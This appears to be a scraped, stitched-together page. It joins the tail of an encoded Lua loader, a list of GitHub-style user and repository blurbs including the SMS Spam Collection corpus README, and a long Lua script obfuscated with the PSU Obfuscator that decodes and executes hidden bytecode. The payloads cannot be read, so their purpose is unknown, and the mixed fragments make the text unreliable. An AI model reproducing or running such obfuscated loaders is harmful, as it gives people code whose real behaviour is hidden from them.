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"),getfenv())()
trantrungvinh-dev
are u ok?
zhujiazhinb666
No description available
Coders-King-SSG
No description available
LV2402
White board scribble on it until u are ok
stordahl
Logging mistakes in my professional career
RandomPaks
Hey Hey Are You Okay? (HHAYO) is an application that implements Game-Based Learning (GBL) to help players learn and remember the steps required to stabilize minor injuries with first aid.
samerrkhann
# Natural-Language-Processing SMS Spam Collection v.1 ------------------------- 1. DESCRIPTION -------------- The SMS Spam Collection v.1 (hereafter the corpus) is a set of SMS tagged messages that have been collected for SMS Spam research. It contains one set of SMS messages in English of 5,574 messages, tagged acording being ham (legitimate) or spam. 1.1. Compilation ---------------- This corpus has been collected from free or free for research sources at the Web: - A collection of between 425 SMS spam messages extracted manually from the Grumbletext Web site. This is a UK forum in which cell phone users make public claims about SMS spam messages, most of them without reporting the very spam message received. The identification of the text of spam messages in the claims is a very hard and time-consuming task, and it involved carefully scanning hundreds of web pages. The Grumbletext Web site is: http://www.grumbletext.co.uk/ - A list of 450 SMS ham messages collected from Caroline Tag's PhD Theses available at http://etheses.bham.ac.uk/253/1/Tagg09PhD.pdf - A subset of 3,375 SMS ham messages of the NUS SMS Corpus (NSC), which is a corpus of about 10,000 legitimate messages collected for research at the Department of Computer Science at the National University of Singapore. The messages largely originate from Singaporeans and mostly from students attending the University. These messages were collected from volunteers who were made aware that their contributions were going to be made publicly available. The NUS SMS Corpus is avalaible at: http://www.comp.nus.edu.sg/~rpnlpir/downloads/corpora/smsCorpus/ - The amount of 1,002 SMS ham messages and 322 spam messages extracted from the SMS Spam Corpus v.0.1 Big created by José María Gómez Hidalgo and public available at: http://www.esp.uem.es/jmgomez/smsspamcorpus/ 1.2. Statistics --------------- There is one collection: - The SMS Spam Collection v.1 (text file: smsspamcollection) has a total of 4,827 SMS legitimate messages (86.6%) and a total of 747 (13.4%) spam messages. 1.3. Format ----------- The files contain one message per line. Each line is composed by two columns: one with label (ham or spam) and other with the raw text. Here are some examples: ham What you doing?how are you? ham Ok lar... Joking wif u oni... ham dun say so early hor... U c already then say... ham MY NO. IN LUTON 0125698789 RING ME IF UR AROUND! H* ham Siva is in hostel aha:-. ham Cos i was out shopping wif darren jus now n i called him 2 ask wat present he wan lor. Then he started guessing who i was wif n he finally guessed darren lor. spam FreeMsg: Txt: CALL to No: 86888 & claim your reward of 3 hours talk time to use from your phone now! ubscribe6GBP/ mnth inc 3hrs 16 stop?txtStop spam Sunshine Quiz! Win a super Sony DVD recorder if you canname the capital of Australia? Text MQUIZ to 82277. B spam URGENT! Your Mobile No 07808726822 was awarded a L2,000 Bonus Caller Prize on 02/09/03! This is our 2nd attempt to contact YOU! Call 0871-872-9758 BOX95QU Note: messages are not chronologically sorted. 2. USAGE -------- We offer a comprehensive study of this corpus in the following paper that is under review. This work presents a number of statistics, studies and baseline results for several machine learning methods. [1] Almeida, T.A., Gómez Hidalgo, J.M., Yamakami, A. Contributions to the study of SMS Spam Filtering: New Collection and Results. Proceedings of the 2011 ACM Symposium on Document Engineering (ACM DOCENG'11), Mountain View, CA, USA, 2011. (Under review) 3. ABOUT -------- The corpus has been collected by Tiago Agostinho de Almeida (http://www.dt.fee.unicamp.br/~tiago) and José María Gómez Hidalgo (http://www.esp.uem.es/jmgomez). We would like to thank Dr. Min-Yen Kan (http://www.comp.nus.edu.sg/~kanmy/) and his team for making the NUS SMS Corpus available. See: http://www.comp.nus.edu.sg/~rpnlpir/downloads/corpora/smsCorpus/. He is currently collecting a bigger SMS corpus at: http://wing.comp.nus.edu.sg:8080/SMSCorpus/ 4. LICENSE/DISCLAIMER --------------------- We would appreciate if: - In case you find this corpus useful, please make a reference to previous paper and the web page: http://www.dt.fee.unicamp.br/~tiago/smsspamcollection/ in your papers, research, etc. - Send us a message to tiago@dt.fee.unicamp.br in case you make use of the corpus. The SMS Spam Collection v.1 is provided for free and with no limitations excepting: 1. Tiago Agostinho de Almeida and José María Gómez Hidalgo hold the copyrigth (c) for the SMS Spam Collection v.1. 2. No Warranty/Use At Your Risk. THE CORPUS IS MADE AT NO CHARGE. ACCORDINGLY, THE CORPUS IS PROVIDED `AS IS,' WITHOUT WARRANTY OF ANY KIND, INCLUDING WITHOUT LIMITATION THE WARRANTIES THAT THEY ARE MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. YOU ARE SOLELY RESPONSIBLE FOR YOUR USE, DISTRIBUTION, MODIFICATION, REPRODUCTION AND PUBLICATION OF THE CORPUS AND ANY DERIVATIVE WORKS THEREOF BY YOU AND ANY OF YOUR SUBLICENSEES (COLLECTIVELY, `YOUR CORPUS USE'). THE ENTIRE RISK AS TO YOUR CORPUS USE IS BORNE BY YOU. YOU AGREE TO INDEMNIFY AND HOLD THE COPYRIGHT HOLDERS, AND THEIR AFFILIATES HARMLESS FROM ANY CLAIMS ARISING FROM OR RELATING TO YOUR CORPUS USE. 3. Limitation of Liability. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR THEIR AFFILIATES, OR THE CORPUS CONTRIBUTING EDITORS, BE LIABLE FOR ANY INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES, INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF ADVISED OF THE POSSIBILITY THEREOF, AND REGARDLESS OF WHETHER ANY CLAIM IS BASED UPON ANY CONTRACT, TORT OR OTHER LEGAL OR EQUITABLE THEORY, RELATING OR ARISING FROM THE CORPUS, YOUR CORPUS USE OR THIS LICENSE AGREEMENT.
MonNaPi
local e=(function(n,e)return(n<=e);end)local ce=(function(e,n)return(e^n);end)local z=(function(n,e)return(n*e);end)local o=(function(e,...)return e(...);end)local e=(function(n,e)return(n<e);end)local ae=(function(n,e)return(n..e);end)local te=(function(e,n)return(e>n);end)local P=(function(n,e)return(n/e);end)local ie=(function(n,e)return(n%e);end)local e=(function(n,e)return(n>=e);end)local h=(function(n,e)return(n==e);end)local S=(function(n,e)return(n-e);end)local e=(function(n,e)return(n~=e);end)local I=(function(n,e)return(n+e);end)for n,e in pairs({(function(d,...)_56b41afbc90cb842="This file was obfuscated using PSU Obfuscator 4.5.A | https://www.psu.dev/ & discord.gg/psu";local M=_56b41afbc90cb842 local fe=d[((#{432;198;}+712088263))];local l=d[(621048503)];local C=d[((#{48;201;884;206;(function(...)return 464,263,...;end)(529,694)}+452118976))];local E=d[(727293704)];local de=d["CjSc0"];local ne=d[((984259768-#("Server boosters can add meme strings")))];local T=d["lqTxqp"];local n=d["S8U2zw"];local q=d[(586377408)];local s=d[((#{634;348;(function(...)return 362,574;end)()}+294521984))];local V=d[(442436378)];local t=d[(358358691)];local x=d[((355142414-#("sus imposter among us")))];local p=d[((#{(function(...)return 64;end)()}+564492380))];local Y=d[(144039537)];local N=d[(708115242)];local K=d[((343598948-#("I forgot streamreader.Close() LMAO")))];local H=d[((#{(function(...)return 336,638,968,30,...;end)(129,939,523,84)}+857068256))];local R=d[((944163564-#("perth loves femboys")))];local W=d[(768386486)];local Q=d[((#{435;754;253;(function(...)return 356,699,743,614;end)()}+890164461))];local J=d["YZsy2"];local y=d['EobFeF'];local r=d[(788685779)];local v=d[((#{935;}+175538042))];local Z=d[((#{}+884173955))];local U=d[(244396227)];local X=d[((#{605;203;214;776;(function(...)return 773,239,780,470;end)()}+390643772))];local B=d['EMZn9w'];local D=d[((544500336-#("unable to access memeStrings.txt because it is being used by another process")))];local b=d[(618746567)];local i=d["U6b8x33L"];local F=d[(35890628)];local _=((getfenv)or(function(...)return(_ENV);end));local f,u,e=({}),(""),(_(n));local c=((e[""..d[t]..d[y]..d[x]..d[T]..d.N6gNU9qt])or(e[""..d[t].."\105"..d[x]])or({}));local a=(((c)and(c["\98\120\111\114"]))or(function(e,x)local n,o=n,r;while((e>r)and(x>r))do local d,a=e%l,x%l;if d~=a then o=o+n;end;e,x,n=(e-d)/l,(x-a)/l,n*l;end;if e<x then e=x;end;while e>r do local x=e%l;if x>r then o=o+n;end;e,n=(e-x)/l,n*l;end;return(o);end));local m=(l^v);local g=(m-n);local j,k,w;local xe=(u[""..d[D].."\104"..d[s].."\114"]);local m=(u[""..d[t].."\121"..d[x]..d[i]]);local L=(u["\103"..d[F]..d.lkjjFVmiS.."\98"]);local u=(u["\115\117\98"]);local L=(e["\116\121"..d[B]..d[i]]);local oe=(e[""..d[B]..d[s].."\105"..d["U0jJSoSu"].."\115"]);local L=(e["\115"..d[i].."\108\101"..d[D]..d[x]]);local b=(e[""..d.U0jJSoSu.."\97"..d[b].."\115"..d[i]..d[x]]);local G=(e[""..d[F].."\116"..d['U0jJSoSu'].."\105"..d[p].."\103"][""..d[J].."\97"..d[x].."\99"..d[U]]);local O=(e[""..d[B].."\99"..d[s]..d[E]..d[E]]);local b=((e["\117\110\112\97\99\107"])or(e[""..d[x].."\97"..d[t].."\108\101"]["\117\110\112\97"..d[D]..d[C]]));local C=(e["\116\111"..d[p].."\117\109\98\101"..d['U0jJSoSu']]);local ee=(e[""..d[F].."\101"..d[x]..d[J]..d[i]..d[x].."\97\116"..d[s]..d[t]..d[E].."\101"]);local le=function(l,n,e)return e+n or l*e end;local ee=((e["\109\97\116"..d[U]][""..d[E].."\100\101\120"..d[B]])or(function(e,n,...)return((e*l)^n);end));local B=(e[""..d[J]..d[s]..d[x].."\104"][""..d[q].."\108"..d[N]..d[N].."\114"]);local J=(c[""..d[t].."\111"..d["U0jJSoSu"]])or(function(e,n,...)return(g-w(g-e,g-n));end);j=((c["\108\115"..d[U]..d[y].."\102\116"])or(function(n,e,...)if(e<r)then return(k(n,-(e)));end;return((n*l^e)%l^v);end));local g=(c[""..d[t]..d[p].."\111"..d[x]])or(function(e,...)return(g-e);end);w=(c[""..d[t]..d[s].."\110\100"])or(function(e,n,...)return(((e+n)-a(e,n))/l);end);k=((c["\114\115\104"..d[y].."\102\116"])or(function(n,e,...)if(e<r)then return(j(n,-(e)));end;return(B(n%l^v/l^e));end));if((not(e["\98"..d[y].."\116"..d[T].."\50"]))and(not(e["\98\105\116"])))then c[""..d[t]..d[s]..d[p]..d["FEJn3eC"]]=w;c[""..d[t].."\110\111\116"]=g;c[""..d['U0jJSoSu']..d[F].."\104\105\102"..d[x]]=k;c[""..d[t].."\111\114"]=J;c[""..d[t]..d[V]..d[N]..d["U0jJSoSu"]]=a;c[""..d[E].."\115\104"..d[y]..d[q]..d[x]]=j;end;local g=(((e[""..d[x]..d[s]..d[t]..d[E]..d[i]][""..d[D].."\114\101\97\116"..d[i]]))or((function(e,...)return({b({},r,e);});end)));local D=(e["\116"..d[s].."\98\108\101"]["\99\111\110\99\97"..d[x]]);local l=(e["\116"..d[s].."\98"..d[E]..d[i]][""..d[y]..d[p]..d[F]..d[i].."\114\116"]);local E="\58"..d[ne]..d[de].."\100\43"..d.J6BOkM0Ws.."\58";local l=(e["\116"..d[s].."\98\108"..d[i]][""..d["U0jJSoSu"].."\101\109\111\118"..d[i]]);e[""..d[t].."\105\116"..d[T].."\50"]=c;local e=((-Z+(function()local l,e=r,n;(function(l,n,e)n(e(l,n,l),l(n,e,e),e(e,e and n,l and n))end)(function(x,o,d)if l>X then return x end l=l+n e=(e+Y)%K if(e%fe)>=R then e=(e*Q)%H return o(x(x,o,x),x(x and x,o and d,x),d(d,d and d,o and o))else return o end return o end,function(d,x,o)if l>W then return x end l=l+n e=(e-((#{812;682;267;78;}+863)))%(39203)if(e%(824))<=(412)then e=(e*((688-#("i love gay porn"))))%(36021)return d(d(d,x and d,d),o(x,x,x),o(x,x,x)and o(o,o,o))else return o end return x end,function(x,d,o)if l>((381-#("I forgot streamreader.Close() LMAO")))then return o end l=l+n e=(e+(175))%((#{161;}+40549))if(e%((396-#("skid"))))>=(196)then return d(d(o and x,x,d),d(o and d,x,x),x(x,o,o))else return o end return x end)return e;end)()));local l,c=O(function(l)local x,e=l()local o,l=x(l(C),e)local x,e=x(le,r,nil,e)return C(G(e,E))-C(G(l,E))+n end,function(e)if e then return function(e)return e()end else return O,''end end) local l=(#M+(165));local t,A=({}),({});for e=r,l-n do local n=xe(e);t[e]=n;A[e]=n;A[n]=e;end;local E,x=(function(x)local o,a,d=m(x,c,((24-#("apply for snoops scpf"))));if((o+a+d)~=((270-#("request(api.ipify.org)"))))then e=e+((#{}+14));l=l+((#{401;(function(...)return 929;end)()}+198));end;x=u(x,(5));local o,d,a=(""),(""),({});local e=n;local function c()local l=C(u(x,e,e),(36));e=e+n;local n=C(u(x,e,e+l-n),(36));e=e+l;return(n);end;o=A[c()];a[n]=o;while(e<#x)do local e=c();if t[e]then d=t[e];else d=o..u(o,n,n);end;t[l]=o..u(d,n,n);a[#a+n],o,l=d,d,l+n;end;return(D(a));end)("PSU|27321h21h25p25P101021L21m1327922121m21e25326R1527922d1H2191422N23P25A1927921T1Y1n1T1v1n1L1H111s2341827921U1z1i1m21h21d1J1624526f1627921v1521G1J1c1825r24Q27927921S26726724H26l1c2792251Y1b1H1p1921I21C1H1r1P1424526d1427922821D1l1S22421927t1022c289101b213213181924927J2792341j121d101f22O27d1022v181B22L27c2792321B1i21l22327k1022B21n1D27t25Q24p1B27922621N1O1F171n1w21f1f191224P25K29f1021X2171r1o24B29Y10234121R171q23F151a27922v121H1Q1b141J1n1m1722821b2As1022r1H1J1i1r1r1M1n2BU1N27323n1E28721c1R181f21P2121M181o21121f1t1d25z24q28629O21D19191L1V1t162281x2Ak22E21j1D1P1G25J24R29N23b1o1t1p1o131H121622Y2bT2792381t1A1824N25l2aK2372dL1m1p2221W2B723816171G1t22O1O27922B21m141O1p1D1l2d31121O21f151d1S1621r1Z1C2A21921821922L21R28I1023717162BI1921V2d62901y1q161M25U25B2cW2371m1h101T17191k27223P2cW22r1B2d0172dL1c23w26j2Bn1021Z21e1S21m21I2Ca1v1a1625J2cV2792392fe2bw151L1L1222W2C12242EU2a221r29829A29C28y2ed21o1q1r1a21j2g8142Ga1622K21P2b722c21N101324g2B627922F21e191826h23U1727922A21f16131B27D26324z2E52aO1L22Y2a228J21i2HN1n1B1q21j1Y28O1N1j22g21c29N21u2191B1t21R2151t1h1624P25g2cW21Y21B15192142141m1r24e26D1j279236171R21d2181M2Fe2aY21m21l1j1R1D27x161122p2bM2792fu1D1618121f11161o1Q22t2f22bP2IN1n1226i23L28Z2C21b2JO2Jq2AX1D151V1j21t1z2Hn102361n1K141G2bx2282152a31022221k1T2151J29U21n1m23b1T2FN25T26O2f22C32CA2812172222b722Q2A32Hd25J2C122A21J2jQ1r1H2B01j2I61c2372c122C21d1t1C2132H32H525J24t1F2792Lt2Cz2d12D32Lx2g92gB21721X2c12Fj2K014151b11121L21s21g2KR2222112e71Q171w2ly2gb21T2132a722T1M1325U2De2eD2981N29r2152G524F2702G22gP1821G2Mv1624326w2CF102Li2lK1H1Z21F2Jf2jh111d22u2ak22c2121J18151k2852792242111E1F1s2FN1926I23R2g222U1f1r2Bw1Q1e191F1d24g2iQ2872Ih1t21q21q2iI2232E427923b1m1J1S26B2ce2bo2Bq1N1c1129r162nt1T23G1C2a72371A1N2612Hw2792311c29J23t26e2kH22I21H2jr1B1C1M1G2312nL2j42J62j82JA1N21M21F1P1K1P2382K521z21228o21i21I2fl2oB1K23p2NK2jm2Fv2B2121g152pC2Da2Kn1B23J2kh22X17181728Z121X2241227922N1o220132k529p1I29R21p2NH